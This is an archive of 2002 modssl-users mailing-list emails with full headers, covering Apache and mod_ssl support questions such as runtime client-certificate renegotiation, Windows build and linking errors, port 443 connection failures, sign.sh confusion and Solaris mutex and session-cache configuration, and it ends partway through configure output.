Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 21:16:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA05885; Thu, 7 Feb 2002 21:15:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA05848; Thu, 7 Feb 2002 21:14:44 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 83FAC4CE73E; Thu, 7 Feb 2002 21:14:43 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g17JoWp76806; Thu, 7 Feb 2002 20:50:32 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailer.lemonplanet.com id UAA02943; Thu, 7 Feb 2002 20:21:06 +0100 (MET) Received: from fw1.lemonplanet.com (localhost.localdomain [127.0.0.1]) by mailer.lemonplanet.com (8.11.2/8.11.2) with SMTP id g17J6Ra04452 for ; Thu, 7 Feb 2002 20:06:27 +0100 Received: from STOSRV-0003 ([192.168.12.11]) by fw1.lemonplanet.com; Thu, 07 Feb 2002 +0100 (W. Europe Standard Time) content-class: urn:content-classes:message Subject: Manipulate SSLVerifyClient runtime MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1B00C.A3F8A800" Date: Thu, 7 Feb 2002 20:21:28 +0100 X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0 Message-ID: Thread-Topic: Manipulate SSLVerifyClient runtime Thread-Index: AcGwDMwaV6SAwSZYRTu0wsjgrVTCpQ== From: "Stefan Ullgren" To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Stefan Ullgren" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------_=_NextPart_001_01C1B00C.A3F8A800 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello! I'm working with security modules using Apache. Background: I have desinged a new proxy module with some extra functionallity. All requests passing=20 the proxy are checked by our AAA server. (Authentication, Authorization, Audit.) Some=20 resources (files) requires stronger authentication methods. One of the methods are SSL. The goal is to control SSL certificate flow from an AAA server. Current solution: SSLVerifyClient are unset. What i do in the proxy are to change mod_ssl=20 sslDir->nVerifyClient / sslServer->nVerifyClient to SSL_CVERIFY_OPTIONAL_NO_CA. This is set in "URI to filename translation" handler of Apache. mod_ssl will then re-negotiate the request and ask for client certificate. (Without any verify check by mod_ssl.) SSLOptions +ExportCertData are set so that the proxy can fetch the certificate in the response handler. (The AAA server verifies the certificate.) In the end of the response handler, the proxy restores nVerifyClient to unset. This solution works. I can control the SSL requirements from the AAA server. Problem: The problem occurs first time mod_ssl tries to re-negotiate. [Tue Feb 5 09:55:33 2002] [error] mod_ssl: Re-negotiation handshake failed: Not accepted by client!? [Tue Feb 5 09:55:33 2002] [error] mod_ssl: SSL error on writing data (OpenSSL library error follows) [Tue Feb 5 09:55:33 2002] [error] OpenSSL: error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure [Tue Feb 5 09:55:33 2002] [info] [client 192.168.64.102] client stopped connection before rflush completed These lines appear in logfile. At this state, the request are 'restarted'.=20 (All apache handlers are restarting) After restart, theese errors don't occur and my application (proxy) works as wanted. Question: This is probably not the best way to control ssl, but i havn't figured out any better way. Don't have the knowledge to design own ssl code. I have searched in openssl/mod_ssl documents / sourcecode about this. I guess this is a tricky question and I probably post in wrong forum, but if anyone have some ideas or suggestions i'll be happy! And why does the request restart like that?=20 Regards, Stefan Ullgren, Develop Lemon Planet AB Phone: +46 (0) 702 69 14 15 e-mail: stefan.ullgren@lemonplanet.com Lemon Planet develops software components and provides services for the new mobile market and customers with high requirements on access, security and collaboration. http://www.lemonplanet.com ------_=_NextPart_001_01C1B00C.A3F8A800 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Manipulate SSLVerifyClient runtime

Hello!

I'm working with security modules using = Apache.

Background:
  I have desinged a new proxy = module with some extra functionallity. All requests passing
  the proxy are checked by our = AAA server. (Authentication, Authorization, Audit.) Some
  resources (files) requires = stronger authentication methods. One of  the methods are = SSL.

  The goal is to control SSL = certificate flow from an AAA server.

Current solution:
  SSLVerifyClient are unset. What = i do in the proxy are to change mod_ssl
  sslDir->nVerifyClient / = sslServer->nVerifyClient to SSL_CVERIFY_OPTIONAL_NO_CA.
  This is set in "URI to = filename translation" handler of Apache.

  mod_ssl will then re-negotiate = the request and ask for client certificate.
  (Without any verify check by = mod_ssl.)

  SSLOptions +ExportCertData are = set so that the proxy can fetch the certificate in
  the response handler. (The AAA = server verifies the certificate.)

  In the end of the response = handler, the proxy restores nVerifyClient to unset.

  This solution works. I can = control the SSL requirements from the AAA server.

Problem:
  The problem occurs first time = mod_ssl tries to re-negotiate.

[Tue Feb  5 09:55:33 2002] = [error] mod_ssl: Re-negotiation handshake failed: Not accepted by = client!?
[Tue Feb  5 09:55:33 2002] = [error] mod_ssl: SSL error on writing data (OpenSSL library error = follows)
[Tue Feb  5 09:55:33 2002] = [error] OpenSSL: error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl = handshake failure
[Tue Feb  5 09:55:33 2002] = [info] [client 192.168.64.102] client stopped connection before rflush = completed

  These lines appear in logfile. = At this state, the request are 'restarted'.
  (All apache handlers are = restarting)
  After restart, theese errors = don't occur and my application (proxy) works as wanted.

Question:
  This is probably not the best = way to control ssl, but i havn't figured
  out any better way. Don't have = the knowledge to design own ssl code.
  I have searched in = openssl/mod_ssl documents / sourcecode about this.

  I guess this is a tricky = question and I probably post in wrong forum, but
  if anyone have some ideas or = suggestions i'll be happy!

  And why does the request restart = like that?


Regards,

Stefan Ullgren, = Develop

Lemon Planet = AB

Phone: +46 (0) 702 69 = 14 15
e-mail: = stefan.ullgren@lemonplanet.com
Lemon = Planet develops software components and provides services for the new = mobile market and customers with high requirements on access, security = and collaboration.  http://www.lemonplanet.com=



------_=_NextPart_001_01C1B00C.A3F8A800-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 23:31:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA15288; Thu, 7 Feb 2002 23:30:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id XAA15233; Thu, 7 Feb 2002 23:29:27 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Feb 2002 14:17:46 -0800 Received: from 156.153.254.2 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 07 Feb 2002 22:17:45 GMT X-Originating-IP: [156.153.254.2] From: "Edward Wong" To: modssl-users@modssl.org Subject: Re: modssl/apache2 compile problems Date: Thu, 07 Feb 2002 14:17:45 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 07 Feb 2002 22:17:46.0104 (UTC) FILETIME=[4500BF80:01C1B025] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've managed to get apache to compile and install seperately from mod_ssl. If I compile mod_ssl seperately, it builds mod_ssl.so fine. However, when I try to load mod_ssl into apache(under win2k), it keeps on saying that it can't find the module /path_to_module/mod_ssl.so. What am I doing wrong? The error is: Cannot load C:/Apache2/modules/mod_ssl.so into the server. The specified module could not be found. Pertinent sectino of httpd.conf is: LoadModule ssl_module modules/mod_ssl.so Please help . . . . . --Ed >From: Leo Baschy >Reply-To: modssl-users@modssl.org >To: modssl-users@modssl.org >Subject: Re: modssl/apache2 compile problems >Date: Sat, 02 Feb 2002 04:57:42 -0800 > >Sounds similar to my problem building that under Windows. Using cygwin. >Using the Visual C++ dsw/dsp projects. Rest of Apache 2.0.28 builds fine. >Have put in openssl etc. (Previously on same machine have successfully >built 1.3.20 with mod_ssl, still do.) > >The problem is specific to lex, specifically flex, processing > lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')' >before 'constant' > >That seems to indicate there is a file ssl_expr_scan.l which is being used >to generate ssl_expr_scan.c and that generation doesn't work right. The .c >file fails to compile. > >A temporary workaround seems to be to skip lex/flex use the ssl_expr_scan.c >file that comes with 2.0.28, but I have no idea whether that might actually >be an (older) incorrect version then. > >Anyone willing to tinker with (or knowledgable about) versions of lex? > >Can ssl_expr_scan.l be fine tuned to make this work again? > >- Leo Baschy > >At 06:02 PM 1/31/02 -0500, Ed Wong wrote: > >Generating Code... > > link.exe @C:\DOCUME~1\edwon\LOCALS~1\Temp\nmb02172. > > Creating library .\Debug\mod_ssl.lib and object .\Debug\mod_ssl.exp > >ssl_expr.obj : error LNK2001: unresolved external symbol >_ssl_expr_yyparse > >ssl_expr_scan.obj : error LNK2001: unresolved external symbol > >_ssl_expr_yylval > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 00:31:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA19143; Fri, 8 Feb 2002 00:30:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id AAA19096; Fri, 8 Feb 2002 00:29:25 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Feb 2002 15:29:19 -0800 Received: from 156.153.254.2 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 07 Feb 2002 23:29:18 GMT X-Originating-IP: [156.153.254.2] From: "Edward Wong" To: modssl-users@modssl.org Subject: Re: modssl/apache2 compile problems Date: Thu, 07 Feb 2002 15:29:18 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 07 Feb 2002 23:29:19.0187 (UTC) FILETIME=[43E13A30:01C1B02F] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I fixed this problem. I wasn't linking the dll to libhttpd properly. everything compiles now, but when I run apache with ssl enables ( -DSSL ), apache no longer responds to requests. . . . Any suggestions? Ed >From: "Edward Wong" >Reply-To: modssl-users@modssl.org >To: modssl-users@modssl.org >Subject: Re: modssl/apache2 compile problems >Date: Thu, 07 Feb 2002 14:17:45 -0800 > >I've managed to get apache to compile and install seperately from mod_ssl. >If I compile mod_ssl seperately, it builds mod_ssl.so fine. However, when >I >try to load mod_ssl into apache(under win2k), it keeps on saying that it >can't find the module /path_to_module/mod_ssl.so. > >What am I doing wrong? The error is: > >Cannot load C:/Apache2/modules/mod_ssl.so into the server. The specified >module could not be found. > >Pertinent sectino of httpd.conf is: > >LoadModule ssl_module modules/mod_ssl.so > >Please help . . . . . > >--Ed > > >>From: Leo Baschy >>Reply-To: modssl-users@modssl.org >>To: modssl-users@modssl.org >>Subject: Re: modssl/apache2 compile problems >>Date: Sat, 02 Feb 2002 04:57:42 -0800 >> >>Sounds similar to my problem building that under Windows. Using cygwin. >>Using the Visual C++ dsw/dsp projects. Rest of Apache 2.0.28 builds fine. >>Have put in openssl etc. (Previously on same machine have successfully >>built 1.3.20 with mod_ssl, still do.) >> >>The problem is specific to lex, specifically flex, processing >> lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')' >>before 'constant' >> >>That seems to indicate there is a file ssl_expr_scan.l which is being used >>to generate ssl_expr_scan.c and that generation doesn't work right. The >>.c >>file fails to compile. >> >>A temporary workaround seems to be to skip lex/flex use the >>ssl_expr_scan.c >>file that comes with 2.0.28, but I have no idea whether that might >>actually >>be an (older) incorrect version then. >> >>Anyone willing to tinker with (or knowledgable about) versions of lex? >> >>Can ssl_expr_scan.l be fine tuned to make this work again? >> >>- Leo Baschy >> >>At 06:02 PM 1/31/02 -0500, Ed Wong wrote: >> >Generating Code... >> > link.exe @C:\DOCUME~1\edwon\LOCALS~1\Temp\nmb02172. >> > Creating library .\Debug\mod_ssl.lib and object .\Debug\mod_ssl.exp >> >ssl_expr.obj : error LNK2001: unresolved external symbol >>_ssl_expr_yyparse >> >ssl_expr_scan.obj : error LNK2001: unresolved external symbol >> >_ssl_expr_yylval >> >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org > > > > >_________________________________________________________________ >MSN Photos is the easiest way to share and print your photos: >http://photos.msn.com/support/worldwide.aspx > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 09:29:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA07747; Fri, 8 Feb 2002 09:28:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA07710; Fri, 8 Feb 2002 09:27:47 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id CE2864CE5F1; Fri, 8 Feb 2002 08:22:44 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g187L9T86116; Fri, 8 Feb 2002 08:21:09 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from overnight.request.net id XAA15695; Thu, 7 Feb 2002 23:41:48 +0100 (MET) Received: from hugin.request.net ([207.150.192.10]) by overnight.request.net with ESMTP id <135402-5449>; Thu, 7 Feb 2002 17:41:19 -0500 Received: from work-xp1.nebulasoft.com ([212.181.103.56]) by hugin.request.net with ESMTP id <444672059-31397207>; Thu, 7 Feb 2002 17:27:03 -0500 Message-Id: <5.1.0.14.2.20020207232924.00c0a568@nebulasoft.com> X-Sender: vildan@nebulasoft.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 X-Priority: 1 (Highest) Date: Thu, 07 Feb 2002 23:39:03 +0100 To: Manfred.Haertel@rz-online.de, owner-modssl-users@modssl.org, modssl-users@modssl.org From: Vildan Hasanbegovic Subject: Page Could Not Be Displayed problem? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Vildan Hasanbegovic X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have read your posts at http://www.mail-archive.com/ regarding "Page cannot be displayed" in browser problems. I am running following configuration: - MS XP - Apache 1.3.23 - PHP 4.1.1 - MySQL 3.23.47 and all users both Internet Explorer and Netscape users have reported this problem when accessing a database running PHP and MySQL. I have posted this issues everywhere, but nobody seems to know what is causing this problem. I have tested both with Latest Apache and latest MySQL (both beta releases) but problem persist.. Thank you, /Vildan ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 09:29:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA07756; Fri, 8 Feb 2002 09:28:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA07714; Fri, 8 Feb 2002 09:27:48 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 173964CE74C; Fri, 8 Feb 2002 08:22:45 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g187LFx86122; Fri, 8 Feb 2002 08:21:15 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web12402.mail.yahoo.com id BAA20488; Fri, 8 Feb 2002 01:02:05 +0100 (MET) Message-ID: <20020208000202.36892.qmail@web12402.mail.yahoo.com> Received: from [63.194.132.37] by web12402.mail.yahoo.com via HTTP; Thu, 07 Feb 2002 16:02:02 PST Date: Thu, 7 Feb 2002 16:02:02 -0800 (PST) From: bhawna sinha Subject: apache and mod_ssl To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: bhawna sinha X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have installed apache web server software and the Apache interface to OpenSSL(mod_ssl) in order to have a secure server. I have changed the configuration file httpd.conf and ssl is enabled on port 443. But the problem is whenever I try the url https://localhost:443, it says cannot connect to server. It seems that it is not able to connect to port 443. Also in the error log it says "invalid method in request". I am attaching the conf file: -------***************************************--------- LoadModule ssl_module modules/mod_ssl.so ServerAdmin bhawna@mailcity.com ServerName 127.0.0.1 SSLMutex sem SSLRandomSeed startup builtin SSLSessionCache none SSLLog logs/ssl.log SSLLogLevel info SSLEngine on SSLCertificateFile conf/ssl/my-server.cert SSLCertificateKeyFile conf/ssl/my-server.key #SSLVerifyClient require #SSLVerifyDepth 1 #SSLCACertificatePath conf/ssl #SSLCACertificateFile conf/ssl/my-server.cert I would appreciate if anyone could give me a solution Thanks Bhawna __________________________________________________ Do You Yahoo!? Send FREE Valentine eCards with Yahoo! Greetings! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 09:46:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA08767; Fri, 8 Feb 2002 09:45:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA08721; Fri, 8 Feb 2002 09:44:26 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id B24084CE74A; Fri, 8 Feb 2002 08:20:52 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g187KnY86029; Fri, 8 Feb 2002 08:20:49 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from stonehenge.sbti.com id VAA05129; Thu, 7 Feb 2002 21:06:26 +0100 (MET) Received: from sbti.com ([208.189.202.23]) by stonehenge.sbti.com (Netscape Messaging Server 4.1) with ESMTP id GR6I6600.2BR; Thu, 7 Feb 2002 13:58:54 -0600 Message-ID: <3C62DF57.299D64D4@sbti.com> Date: Thu, 07 Feb 2002 14:11:04 -0600 From: Pete Serafin X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org, pserafin@sbti.com Subject: Sign.sh Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pete Serafin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I need help in configuring the sign.sh so that I can sign my own certificates. Problem is that Im not familiar with perl. Upon first executing the script, I get this error: F:\oas\Apache\Apache\conf>perl sign.sh ssl.csr\sandbox5.csr Can't modify constant item in scalar assignment at sign.sh line 9, near "$1 if" syntax error at sign.sh line 9, near "-ne" Semicolon seems to be missing at sign.sh line 10. syntax error at sign.sh line 12, near "fi " Semicolon seems to be missing at sign.sh line 13. syntax error at sign.sh line 15, near "fi case " Bareword found where operator expected at sign.sh line 15, near "$CSR in" (Missing operator before in?) Bareword found where operator expected at sign.sh line 16, near ") CERT" (Missing operator before CERT?) Bareword found where operator expected at sign.sh line 17, near "* ) CERT" (Missing operator before CERT?) syntax error at sign.sh line 17, near "* ) CERT" syntax error at sign.sh line 22, near "then mkdir" Not enough arguments for index at sign.sh line 27, near "index ]" Bareword found where operator expected at sign.sh line 28, near "/dev/null" (Missing operator before null?) syntax error at sign.sh line 28, near "/dev/null ca" Semicolon seems to be missing at sign.sh line 33. Semicolon seems to be missing at sign.sh line 35. Semicolon seems to be missing at sign.sh line 37. Semicolon seems to be missing at sign.sh line 44. Semicolon seems to be missing at sign.sh line 45. "no" not allowed in expression at sign.sh line 47, near "= " Semicolon seems to be missing at sign.sh line 49. String found where operator expected at sign.sh line 60, near "echo "CA signing: $CSR -> $CERT:"" (Do you need to predeclare echo?) Semicolon seems to be missing at sign.sh line 60. Semicolon seems to be missing at sign.sh line 61. String found where operator expected at sign.sh line 62, near "echo "CA verifyin g: $CERT <-> CA cert"" (Do you need to predeclare echo?) Semicolon seems to be missing at sign.sh line 62. Semicolon seems to be missing at sign.sh line 65. Execution of sign.sh aborted due to compilation errors. Any help would be greatly appreciated. Pete Serafin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 10:29:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA11165; Fri, 8 Feb 2002 10:28:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lv.raad.tartu.ee id KAA11133; Fri, 8 Feb 2002 10:27:28 +0100 (MET) Received: Message by Barricade lv.raad.tartu.ee with ESMTP id g189RNi10345; Fri, 8 Feb 2002 11:27:23 +0200 Message-Id: <200202080927.g189RNi10345@lv.raad.tartu.ee> Received: from INFO/SpoolDir by raad.tartu.ee (Mercury 1.48); 8 Feb 02 11:26:57 +0200 Received: from SpoolDir by INFO (Mercury 1.48); 8 Feb 02 11:26:46 +0200 From: "Toomas Aas" Organization: Tartu City Government To: bhawna sinha , modssl-users@modssl.org Date: Fri, 8 Feb 2002 11:26:44 +0200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: apache and mod_ssl In-reply-to: <20020208000202.36892.qmail@web12402.mail.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Toomas Aas" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi bhawna! On 7 Feb 02 at 16:02 you wrote: > problem is whenever I try the url > https://localhost:443, it says cannot connect to > server. Have you tried just https://localhost ? It should work without specifying the port, but it also should work when you do specify the port. Do you have 'Listen 443' somewhere in your config file? You should. -- Toomas Aas | toomas.aas@raad.tartu.ee | http://www.raad.tartu.ee/~toomas/ * Make yourself at home! Clean my kitchen. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 14:55:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA25119; Fri, 8 Feb 2002 14:54:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail-relay1.sift.co.uk id OAA25086; Fri, 8 Feb 2002 14:53:17 +0100 (MET) Received: by mail-relay1.sift.co.uk (Postfix, from userid 682) id 82AF356790; Fri, 8 Feb 2002 13:53:06 +0000 (GMT) Received: from sift.co.uk (sleazy.office.sift.co.uk [172.17.64.10]) by mail-relay1.sift.co.uk (Postfix) with ESMTP id A70A2528AE for ; Fri, 8 Feb 2002 13:53:05 +0000 (GMT) Message-ID: <3C63D841.1070805@sift.co.uk> Date: Fri, 08 Feb 2002 13:53:05 +0000 From: Andy Osborne Organization: Sift Group User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-gb, en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Sign.sh References: <3C62DF57.299D64D4@sbti.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-AntiVirus: mail-relay1 scanned for viruses by AMaViS 0.2.1 (http://amavis.org/) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andy Osborne X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Pete Serafin wrote: > I need help in configuring the sign.sh so that I can sign my own > certificates. Problem is that Im not familiar with perl. Upon first > executing the script, I get this error: Hmmm.....I may be missing something here, but sign.sh is a bourne shell script, not perl. Andy -- Andy Osborne **************** "Vertical B2B Communities" Senior Internet Engineer Sift Group Ltd. 100 Victoria Street, Bristol BS1 6HZ tel:+44 117 915 9600 fax:+44 117 915 9630 http://www.sift.co.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 15:26:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA26958; Fri, 8 Feb 2002 15:25:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from qeo02001.t-online.net id PAA26940; Fri, 8 Feb 2002 15:24:52 +0100 (MET) Received: from qeo01007.da.t-online.net (qeo01007.da.t-online.net [192.168.197.4]) by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id PAA08538 for ; Fri, 8 Feb 2002 15:24:47 +0100 Received: from qeo01006.da.t-online.net ([192.168.197.66]) by qeo01007.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR7XDA00.B54 for ; Fri, 8 Feb 2002 15:24:46 +0100 Received: from t-online.net ([192.168.193.21]) by qeo01006.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR7XDA02.9HX for ; Fri, 8 Feb 2002 15:24:46 +0100 Message-ID: <3C63DFAE.2948C322@t-online.net> Date: Fri, 08 Feb 2002 15:24:46 +0100 From: "Bert Courtin" Organization: T-Online International AG X-Sender: "Bert Courtin" X-Mailer: Mozilla 4.51 [de]C-CCK-MCD DTOS 1999062601 IT/DV NBE (WinNT; U) X-Accept-Language: de,en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: mod_ssl: SSLMutex lock 'sem' and SSLSessionCache storage 'shm:' not available on Solaris8 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bert Courtin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'm trying to compile the following apache_1.3.23 & mm-1.1.3 & openssl-0.9.6c & mod_ssl-2.8.6-1.3.23 and get SSLMutex lock 'sem' and SSLSessionCache storage 'shm:' available on Solaris8/SPARC (sparc-sun-solaris2.8) - without any success:-( The apache build reports always (I now've tried a few tens combinations of configure options) httpd -L: -------------------------------- SSLMutex (mod_ssl.c) SSL lock for handling internal mutual exclusions (`none', `file:/path/to/file') Allowed in *.conf only outside , or SSLSessionCache (mod_ssl.c) SSL Session Cache storage (`none', `dbm:/path/to/file') Allowed in *.conf only outside , or -------------------------------- Here's what I did: (I've added the output of these commands to this mail, see below): ------------------------------------------------------------------------------------- apache_1.3.23 # ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} mm-1.1.3 # ./configure --prefix=/${TARGET_DIR}/${MM} --disable-shared --with-sem=IPCSEM openssl-0.9.6c # ./config --prefix=/${TARGET_DIR}/${OPENSSL} -fPIC shared mod_ssl-2.8.6-1.3.23 # ./configure --with-apache=../apache_1.3.23 \ --with-ssl=../openssl-0.9.6c \ --with-mm=../mm-1.1.3 \ --prefix=/opt/apache_1.3.23 \ --disable-rule=SSL_COMPAT What's wrong with that respectively where may be the problem - or is there a bug with these releases on my platform? Thank you & kind regards, Bert Courtin ------------------------------------------------------------------- Preconfiguring Apache: ------- root@wowebref01 apache_1.3.23 # ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} Configuring for Apache, Version 1.3.23 + using installation path layout: Apache (config.layout) Creating Makefile Creating Configuration.apaci in src Creating Makefile in src + configured for Solaris 280 platform + setting C pre-processor to gcc -E + checking for system header files + adding selected modules + using builtin Expat + checking sizeof various data types + doing sanity check on compiler and options Creating Makefile in src/support Creating Makefile in src/os/unix Creating Makefile in src/ap Creating Makefile in src/main Creating Makefile in src/lib/expat-lite Creating Makefile in src/modules/standard Configuring mm-1.1.3: --------------------- root@wowebref01 mm-1.1.3 # ./configure --prefix=/${TARGET_DIR}/${MM} --disable-shared --with-sem=IPCSEM | tee -a conf.out Configuring MM (Shared Memory Library), Version 1.1.3 (01-Jul-2000) Copyright (c) 1999-2000 Ralf S. Engelschall, All Rights Reserved. Platform: sparc-sun-solaris2.8 loading cache ./config.cache Build Tools: checking for gcc... (cached) gcc checking whether the C compiler (gcc ) works... yes checking whether the C compiler (gcc ) is a cross-compiler... no checking whether we are using GNU C... (cached) yes checking whether gcc accepts -g... (cached) yes checking how to run the C preprocessor... (cached) gcc -E checking for compilation debug mode... disabled checking whether make sets ${MAKE}... (cached) yes checking for ranlib... ranlib checking for object suffix... o checking for executable suffix... no checking for gcc option to produce PIC... -fPIC checking if gcc PIC flag -fPIC works... yes checking if gcc supports -c -o file.o... yes checking if gcc supports -c -o 